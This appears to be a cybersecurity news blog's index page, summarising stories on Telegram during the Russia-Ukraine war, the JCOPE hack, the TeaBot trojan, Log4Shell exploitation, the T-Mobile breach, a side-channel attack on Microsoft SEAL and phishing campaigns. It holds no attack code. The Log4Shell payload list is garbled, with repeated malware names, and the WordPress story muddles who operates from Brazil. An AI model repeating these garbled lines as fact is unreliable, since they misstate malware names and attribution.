Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

War
Cyber Security Fake news Russia-Ukraine War Ukraine War

Report: Telegram's New Battleground for Cybercriminals Amid Russia-Ukraine War

 

Telegram messenger has become increasingly crucial in the ongoing crisis between Russia and Ukraine, since it is widely used by both hackers and cybercriminals. 

According to a survey by cybersecurity firm Check Point, the number of Telegram groups has surged sixfold since February 24, and some of them, dedicated to certain issues, have grown in size, with over 250,000 members in some cases.

The following three categories are the most popular ones that have exploded in popularity as a direct result of Russia's invasion of Ukraine: 
• Various "news feeds" that claim to provide credible reports from Ukraine 
• Volunteering hackers that engage in DDoS and other types of assaults against Russian organisations 
• Fundraising groups that collect cryptocurrency donations reportedly for Ukrainian support 

The "IT Army of Ukraine," which presently has 270,000 members, stands out among those who lead the anti-Russia cyber-warfare activities. Ukraine's IT Army was formed by cyber-specialists in the country, and the results of its operations were evident rapidly. 

Apart from launching DDoS attacks against important Russian websites, the group also publishes the personal information of Russian decision-makers and other key players in the conflict. The majority of Telegram groups that claim to be "donation support" are scammers that take advantage of the circumstance to steal people's money. 

Similar operations based on phishing emails have been reported, but the same thing is happening on Telegram as well, with some of these groups having up to 20,000 members. 

Unverified news

News streams that bypass mainstream outlets and publish unedited, uncensored feeds from the battle zone 24/7, are the third category that is rising. Apart from the fact that exposing unedited battle scenes is against journalistic ethics, many of the stories shared on these sites are unchecked or unverified, and might easily be made up. 

As geopolitical expert Michael Horowitz revealed while sharing footage of a realistic-looking computer-generated air dogfight based on a video game engine, this is a concern even for approved social media platforms.

According to Check Point, these channels continue to attract a high number of users. 'Ukraine War Report,' for example, has 20,000 members, while 'Russia vs. Ukraine Live News,' has 110,000. 'Ukrainian Witness' (видетел крaин), another news programme dedicated to exposing Russian war crimes, has achieved 100,000 subscribers. The goal of groups that actively propagate false material on Telegram channels is to demoralise the opponent, with the hope that the content would be shared on other platforms as well. While some of these channels may provide genuine information, it's practically impossible for users to tell the difference between true and fake news. 

To protect from fraud and cyber-crime when using Telegram, the researchers advised users to be cautious of the information they share on the network. Users should avoid clicking on links with unknown origins, to be wary of strange requests, and to avoid donating money to unknown sources.
Read more »
USA
cyber attack Cyber Threats Cybersecurity Datatheft USA

Cyber-Attack on New York Ethics Watchdog



Databases maintained by New York’s public watchdog agency have to shut down their systems after state information technology researchers discovered a malicious cyber-attack on its web servers. 

The ethics watchdog, which regulates lobbying at the State Capitol reported last Friday evening that an investigation has been launched to determine the scope of the attack and the perpetrators behind the attack after it received an alert regarding suspicious activity on JCOPE’s network.

Following the attack, the Commission has shut down the systems as a precaution, including its lobbying application and financial disclosure statement online filing system.

JCOPE reported that the systems will remain shut down until the agency resume normal operations safely. As of the present, the Agency officials did not report anything regarding who was responsible for the attack. However, the agency said that they are planning to work with state law enforcement officials to investigate the attack.

“Our first and highest priority is the safety and integrity of the data entrusted to the Commission by the regulated community,” said JCOPE Executive Director Sanford Berland in a statement.

Following the attack, the public was not able to access the data about lobbyist expenditures. Lobbyists were kept from submitting their required records. JCOPE said that it will grant automatic extensions to the people who missed a deadline because of the outage. 

Walter McClure, a JCOPE spokesperson added that "the outage also affects searches using the agency’s legacy lobbyist filing system, which was in use until 2019".
Read more »
Teabot
Android Trojan Cyber Attacks Cyberspace Cyberthreats Teabot

Android Malware in Google Play Stealing Victim's Data

 

Cyber threat intelligence warned the users that an Android banking malware ‘TeaBot’ stealing users' private data and SMS messages has been downloaded thousands of times via Google Play Store. According to the experts, 'TeaBot,' is an Android banking trojan that first came to be known at the beginning of 2021 as a trojan designed to steal victims' text messages. 

According to the online fraud management and prevention solution Cleafy, in the initial phase, TeaBot was distributed through smashing campaigns using a predefined list of lures, such as VLC Media Player, TeaTV, DHL and UPS, and others. 

Following the incident, the researchers said that "In the last months, we detected a major increase of targets which now count more than 400 applications, including banks, crypto exchanges/wallets, and digital insurance, and new countries such as Russia, Hong Kong, and the US." 

From February, TeaBot Trojan has started supporting new foreign languages including Russian, Mandarin Chinese, and Slovak. It helps cybercriminals in displaying custom messages during the installation phases. 

On February 21, the Threat Intelligence and Incident Response (TIR) team from Cleafy has detected an application and published it on the official Google Play Store, which was acting as a dropper application delivering TeaBot with a fake update procedure. Once downloaded by the user, the dropper will ask them to update immediately through a popup message. 

"The dropper lies behind a common QR Code & Barcode Scanner and it has been downloaded more than 10,000 times. All the reviews display the app as legitimate and well-functioning," the team added.
Read more »
Vulnerabilities and Exploits
Apache Vulnerability Crypto Mining CVE DDOS Attacks JavaScript Log4Shell Mirai botnet Vulnerabilities and Exploits

Log4Shell Utilized for Crypto Mining and Botnet Creation

 

The serious problem in Apache's widely used Log4j project, known as Log4Shell, hasn't caused the calamity predicted, but it is still being exploited, primarily from cloud servers in the United States. Because it was reasonably straightforward to exploit and since the Java application logging library is implemented in many different services, the Log4Shell vulnerability was brought to attention as it raised concerns for being potentially abused by attackers. 

According to a Barracuda study, the targeting of Log4Shell has fluctuated over the last few months, but the frequency of exploitation attempts has remained pretty stable. Barracuda discovered the majority of exploitation attempts originated in the United States, followed by Japan, Central Europe, and Russia. 

Researchers discovered the Log4j version 2.14.1 in December 2021. Reportedly, all prior versions were vulnerable to CVE-2021-44228, also known as "Log4Shell," a significant zero-day remote code execution bug.

Log4j's creator, Apache, attempted to fix the problem by releasing version 2.15.0. However, the vulnerabilities and security flaws prolonged the patching race until the end of every year, when version 2.17.1 ultimately fixed all issues. 

Mirai malware infiltrates a botnet of remotely managed bots by targeting publicly outed network cameras, routers, and other devices. The threat actor can then use this botnet to launch DDoS assaults on a single target, exhausting its resources and disrupting any online services. The malicious actors behind these operations either rent vast botnet firepower to others or undertake DDoS attacks to extort money from businesses. Other payloads which have been discovered as a result of current Log4j exploitation include: 

  • Malware is known as BillGates (DDoS)
  • Kinsing is a term used to describe the act of (cryptominer) 
  • XMRig XMRig XMRig X (cryptominer) 
  • Muhstik Muhstik Muhstik (DDoS) 

The payloads range from harmless online jokes to crypto-mining software, which utilizes another person's computers to solve equations and earn the attacker cryptocurrency like Monero. 

The simplest method to protect oneself from these attacks is to update Log4j to version 2.17.1 or later, and to maintain all of the web apps up to date. Even if the bulk of threat actors lose interest, some will continue to target insecure Log4j deployments since the numbers are still significant. 

Security updates have been applied to valuable firms which were lucrative targets for ransomware assaults, but neglected systems running earlier versions are good targets for crypto mining and DDoS attacks.
Read more »
Programming Language
AI Cyber Security New Technology Programming Language

Hackers Becoming More Advanced at Escaping AI/ML Technologies

 

Deep Instinct Threat Research team deeply enquired attack volumes and types and then extracted their results to forecast the future of cybersecurity scenarios, deciding what excites attackers, and lastly, it laid out steps that a company can take in order to safeguard itself from future cyberattacks. Key takeaways from this report include 2021 threat patterns which hint that bad actors are becoming more sophisticated in escaping AI/ML technologies, provoking companies to redouble attempts in the innovation battle. 

Particular attack vectors grew substantially, it includes a 170% rise in the use of Office droppers and a 125% rise in all threat types included. The amount of malware variants is considerably higher compared to pre-pandemic cases. Besides this, malicious actors have made a considerable turn towards newer languages like Python and Go, from older programming languages, like C and C++. These new languages offer easy learning and programming compared to their earlier variant. 

However, they are not commonly used, hence lower chances to be found by cybersecurity tools or get identified by cybersecurity experts. "Recent major events, such as Log4j and Microsoft Exchange server attacks, have placed a heightened priority on security, but these threats have long deserved the attention they’re just now getting on a global level. The results of this research shed light on the wide-ranging security challenges that organizations face on a daily basis," said Deep Instinct CEO Guy Caspi. 

Other Attack Volumes Types

Supply Chain Attacks- Big organizations with large client offerings often become easy targets for supply chain attacks in 2021. Here, hackers look to gain environmental access as well as target the customers by proxy. 

Prevalent Public and Private Sector Collaborations- A great deal of partnership was witnessed amid international enforcement agencies in the past year, the purpose was to identify and catch threat actors. 

High Impact of Zero-day- Major vulnerabilities were exploited and abused in a single day of a vulnerability disclose. Famous example includes HAFNIUM Group, it came out after Microsoft disclosed various zero-day vulnerabilities. 

Hackers have grown in terms of escaping identification and privilege escalation. Threat actors have started investing in anti-AI cyberattack techniques and use these methods into their campaigns.
Read more »
User Privacy
Dark Web Data Breach Data Theft User Privacy

T-Mobile Users Impacted by August Data Breach are at Risk of Identity Theft

 

A new warning was issued on Wednesday for T-Mobile data breach victims of potential identity theft risks. New York State Attorney General Letitia James warned victims affected by an August 2021 breach that their private details might be circulating for sale on the dark web. 
 
Last year in August 2021, T-Mobile reported a data breach that ended up compromising the private details of millions of T-Mobile users, including former clients and prospective buyers.  
 
Of the 53 million persons impacted by the data breach, more than 4 million were New Yorker residents who had their names, dates of birth, Social Security numbers, and driver’s license details were exposed, according to the press release issued by the Attorney General's office.   
 
Additionally, the attackers stole technical data — including international mobile equipment identities (IMEIs) and international mobile subscriber identities. IMEIs, which are often used for advertising purposes, are a unique fingerprint for a device that cannot be reset.  
 
“Recently, a large subset of the information compromised in the breach was discovered for sale on the dark web — a hidden portion of the Internet where cybercriminals buy, sell, and track personal information,” the warning reads.  
 
“Many individuals received alerts through various identity theft protection services informing them that their information was found online in connection with the breach, confirming that impacted individuals are at heightened risk for identity theft.” Officials from California, Florida, and several other states issued similar warnings. 
 
The state attorneys general noted that identity protection services already have alerted concerned individuals that their private details had been found online. Cybercrime forums have been under increased pressure by state, federal, and international law enforcement agencies, but the buying and selling of people’s personal data is still an increasingly active criminal act.  
 
Citizens who believe they were affected by the data breach are suggested to take the appropriate steps to protect their information from identity theft. This includes checking credit reports; considering contacting the Equifax, Experian, and TransUnion credit bureaus to place a free credit freeze on personal credit reports; and requesting credit reporting services to provide fraud warnings.
Read more »
Third Party Apps
Cyber Security Data Analytics Encryption Microsoft Research Third Party Apps

Researchers Reveal New Side-Channel Attack on Homomorphic Encryption

 

A group of academics from North Carolina State University and Dokuz Eylul University have revealed the "first side-channel attack" on homomorphic encryption, which may be used to disclose data while the encryption process is in progress. 

Aydin Aysu, one of the authors of the study, stated, "Basically, by monitoring power consumption in a device that is encoding data for homomorphic encryption, we are able to read the data as it is being encrypted. This demonstrates that even next generation encryption technologies need protection against side-channel attacks." 

Homomorphic Encryption is a kind of encryption that enables specific sorts of computations to be done directly on encrypted data without the need to first decrypt it. It's also designed to protect privacy by permitting sensitive data to be shared with other third-party services, such as data analytics organisations, for additional processing while the base data remains encrypted and, as a result, unavailable to the service provider. 

To put it another way, the purpose of homomorphic encryption is to make it easier to establish end-to-end encrypted data storage and computation services that don't require the data owner to provide their secret keys with third-party services. The researchers proposed a data leakage attack based on a vulnerability found in Microsoft SEAL, the tech giant's open-source implementation of the technology, that could be abused in a way that enables the recovery of a piece of plaintext message that is homomorphically encrypted, successfully undoing the privacy safeguards.

The attack, dubbed RevEAL, takes advantage of a "power-based side-channel leakage of Microsoft SEAL prior to v3.6 that implements the Brakerski/Fan-Vercauteren (BFV) protocol" and "targets the Gaussian sampling in the SEAL's encryption phase and can extract the entire message with a single power measurement," as per the researchers. 

SEAL versions 3.6 and after, released on December 3, 2020, and beyond, employ a different sampling technique, according to the researchers, who also warn that future versions of the library may have a "different vulnerability." 

Kim Laine, Microsoft's principal research manager who heads the Cryptography and Privacy Research Group, stated in the release notes, "Encryption error is sampled from a Centered Binomial Distribution (CBD) by default unless 'SEAL_USE_GAUSSIAN_NOISE' is set to ON. Sampling from a CBD is constant-time and faster than sampling from a Gaussian distribution, which is why it is used by many of the NIST PQC finalists."
Read more »
WordPress
cyber attack Cyber War Infected websites Ukraine WordPress

Cyber Attacks Targeted on Websites Using Wordpress

Thirty Ukrainian Universities were hacked as a result of the targeted cyberattack supporting Russia's attack on Ukraine. In the latest report, experts from Wordfence said that the cyber attack had massive repercussions on Ukrainian Education organizations by hackers known as Monday Group. The threat actor has openly supported Russia's invasion of Ukraine. The members of the hacking group identify themselves as 'the Mxonday' has attacked the websites using WordPress hosting more than in the past two weeks, since the start of the Russian invasion of Ukraine. 


As per the Wordfence blog, the firm protects more than 8,000 Ukranian websites, around 300 of these belong to education websites. Wordfence also offers assistance to government agencies, police, and military websites. The security firm also mentioned that it experienced a rise of 144,000 cyber attacks on February 25, the second day of the Kinetic attack. The rise is three times the number of regular attacks compared to the starting of the month across the Ukranian websites that Wordfence protects. According to founder and CEO Mark Maunder, a threat actor was continuously trying to attack Ukranian websites, immediately after the Ukranian invasion. 

An inquiry into the issue found four IP addresses associated with the campaign, these are distributed through a VPN service from Sweden. The hacking group also has ties with Brazil, Wordfence is supposed to be operating from here. But the threat actors behind the cyber attack are yet to be known. The report comes after ESET's new research, which mentioned various malware families that are used in targeted cyber attacks against organizations in Ukraine. An ESET blog reported a destructive campaign that used HermeticWiper that targets different organizations. 

The cyberattacks comprised of three elements; HermeticWiper, which corrupts a system making it inoperable, HermeticWizard, which spreads HermeticWiper across the local network via WMI and SMB, and lastly, HermeticRansom. According to the blog, the cyberattack was preceded by a few hours from the start of the Russian invasion of Ukraine. The malware used in these attacks suggests that the planning of the campaign was done months ago. HermeticWiper has been found in hundreds of systems in the last five Ukrainian organizations, says ESET. It also mentioned that no tangible connection with a known threat actor has been found yet.
Read more »
Financial Data Breach
Credential Stuffing Data Breach EV sector Financial Data Breach

E-Bike Phishing Sites Abuse Google Ads to Push Scams

 

A large-scale phishing campaign making headlines involving over 200 scam sites that are deceiving users into providing their sensitive data to the fake investments schemes impersonating genuine brands.
Following the news, two cyber security analysts Ankit Dobhal and Aryan Singh have stated in their research that this phishing campaign has caused financial damages of up to $1,000,000, coming from tens of thousands of victims. 

The fraudulent operation was discovered by the Singaporean security firm CloudSEK, which has shared its report with media firms enunciating that this phishing campaign apparently victimized the Indian audiences through Google Ads and SEO by drawing them to hundreds of fake websites. 

The Indian government has recently launched favorable policies to uplift the growth of the country's electric vehicle sector. According to the Indian analysis reports, before the end of this decade, these new policies will bring a growth of 90% (CAGR) for the Indian EV sector, making it a $200 billion sector. The Country is already experiencing a boost in this sector, over 400 EV start-ups have already taken place while existing automotive companies are also promoting their operations in the EV sector. 

Because of the boom in this industry, the group of Cyber threat actors victimized people with an explosion of websites attempting to exploit victims with fake information. The malicious actors ensure a steady influx of potential victims by abusing Google Ads, stuffing their phony sites with keywords, and impersonating popular companies such as Revolt and Ather. 

It has been noticed in many cases that the threat actors simply copy the content, layout, style, and all images of the genuine sites and create clones. Furthermore, in other cases, the scammers make entirely fictional marketplaces using generic words like "ebike". 

When users login into the websites, the scammers instruct them to enter their full address including their names, email addresses, contact numbers, to register on the platforms. After the registration, the scammers ask them to pay the required fee to become an EV dealer or purchase a product on the site.
Read more »
User Security
Fake news Technology threat report User Security

Google TAG Takes Down Coordinated Influence Operation Spreading Fake Information

 

Google's Threat Analysis Group (TAG) in its latest published bulletin, provides an outline of the entire “coordinated influence operation” that its staff tracked in January 2022 involving multiple countries. 
 
According to Google TAG, four YouTube channels, two AdSense accounts, 1 Blogger blog, and 6 domains – used to generate revenue by displaying advertisements – were wiped out in coordinated influence operations linked to Belarus, Moldova, and Ukraine. The campaign "was sharing content in English that was about a variety of topics including US and European current events," threat analysts explained.   

To mitigate the spread of misinformation, Google TAG terminated 3 YouTube channels responsible for uploading content in Arabic that was critical of former Sudanese president Omar al-Bashir and supportive of the 2019 Sudanese coup d’état.   
 
Additionally, Google TAG also handled a relatively large "influence operation linked to China." Earlier this year in January, threat analysts terminated 4,361 YouTube channels for spreading Chinese spam content. However, some channels uploaded content in both English and Chinese languages concerning China and US foreign events.   
 
“We terminated 4361 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to China. These channels mostly uploaded spammy content in Chinese about music, entertainment, and lifestyle. A very small subset uploaded content in Chinese and English about China and U.S. foreign affairs. These findings are consistent with our previous reports,” says Google. 
 
Furthermore, Google TAG has banned YouTube channels, AdSense accounts, and Play developer accounts belonging to influence campaigns linked to Iraq, Turkey, and Libya's politics and current affairs.   
 
As the Russian-Ukraine conflict continues to escalate, Google has strengthened the safety measures for those in the region considered to be at higher risk of cyber assaults or attempted account compromise. This includes enabling two-factor authentication (2FA) and promoting the Advanced Protection Program.   
 
"Threat intel teams continue to look out for and disrupt disinfo campaigns, hacking, and financially motivated abuse, and are working with other companies and relevant government bodies to address these threats.,” Google said on Twitter.  
 
Last year, Google TAG blocked 3 YouTube channels used by Iranian attackers to publish content in Bosnian and Arabic condemning the actions of the U.S. and the People’s Mujahedin Organization of Iran (PMOI), a militant organization fighting against the official Iranian government.
Read more »
Vkontakte
Cyber News Mobile Security Pavel Durov Russia Telegram Telegram Messenger Ukraine VK Vkontakte

Telegram has Experienced a Global Outage

 

On Thursday, March 3, the popular messenger Telegram experienced a failure. Users reported about the problems on the website of the service Downdetector, which tracks problems with access to Internet resources. 

According to Downdetector, the failure occurred at about 14 o'clock Moscow time. The majority of those who left complaints (56 percent) reported problems with the server connection. Users also noted problems with receiving messages (22 percent) and the operation of the application (23 percent). 

The failure affected residents of Russian cities, including Moscow and St. Petersburg. Users from Ukraine and Belarus also complained about the problems. 

The other day Pavel Durov published the following statement: "We do not want Telegram to be used as a tool to exacerbate conflicts and incite interethnic discord. In the event of an escalation of the situation, we will consider the possibility of partially or completely restricting the operation of Telegram channels in the countries involved during the conflict." 

According to him, recently Telegram has been increasingly used to spread fakes and unverified data related to the war, and the administration does not have the opportunity to check all publications for authenticity. However, soon Durov promised not to limit the work of the messenger in Ukraine. 

According to him, "a lot of users have asked us not to consider disabling Telegram channels for the period of the conflict, since we are the only source of information for them." But he urges users to "double-check and not take for granted the data that is published in Telegram channels during this difficult period." 

It is worth noting that in the week since the beginning of Russia's military operation in Ukraine, news channels in the Telegram messenger have added 19.5 million new subscribers. Another Russian social network, created at the time by Pavel Durov, is experiencing a new surge in popularity due to technical problems of other social networks. In VK, views in the news feed increased by 5% over the week, and the average daily number of video views increased by 15%. People are looking on platforms for up-to-date information from media that are subject to hacker attacks, and from eyewitnesses of events. 

Earlier, CySecurity News reported that three popular foreign social networks - Facebook, Instagram and Twitter began to receive complaints from residents of Russia in large numbers.
Read more »
Subscribe to: Comments (Atom)